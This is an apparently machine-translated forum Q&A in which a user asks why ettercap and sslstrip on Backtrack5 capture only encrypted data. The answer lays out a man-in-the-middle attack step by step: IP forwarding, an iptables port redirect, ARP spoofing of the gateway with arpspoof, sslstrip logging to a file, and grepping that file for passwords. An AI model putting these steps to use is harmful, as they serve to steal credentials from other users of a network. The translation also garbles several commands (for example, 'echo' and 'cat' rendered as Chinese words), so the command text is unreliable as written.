2012-08-07 147 views
1

我使用Backtrack5這個..但我堅持...我無法得到我想要的數據,我使用EttercapSSL地帶此...HTTPS/SSL嗅探

有沒有人在這裏有任何想法如何做到這一點?

+0

只是想檢查這件事是否真的發生或不... 我已經使用sslstrip假證書和ettercap獲取所有的數據包..但它不工作的方式,我想...它越來越我有相同的加密數據.. – Harry47 2012-08-07 13:57:40

回答

2

Idk你是怎麼做的,但對我來說,ettercap-gtk(gui)一直都是垃圾。我建議跳過ettercap,除非你想要簡單的DNS欺騙,並且走另一條路線。

讓我給你一些步驟,首先是對這種攻擊(中間人,amirite)設置你的iptables和啓用IP_FORWARD(荷蘭國際集團)

回聲 「1」>的/ proc/SYS /網/支持IPv4/IP_FORWARD

的iptables -t NAT -A PREROUTING -p tcp的--destination-80端口重定向-j --to端口1337(可以選擇你要送他們到任何端口)

我們成爲中間的人:在這裏我們使用arpspoof: arpspoof -i wlan0(或任何接口)192.168.1.X(X是網關典型的.1或.255)

然後用SSLStrip你可以繼續./sslstrip.py -1 1337 -w文件名(1337是從早期端口,文件名是您要轉儲數據到任何文件名)

貓文件名(從更早)甚至管道| grep「密碼」或者你正在嗅探什麼,或者你可以轉儲所有內容。該文件將填滿捕獲/剝離的https數據。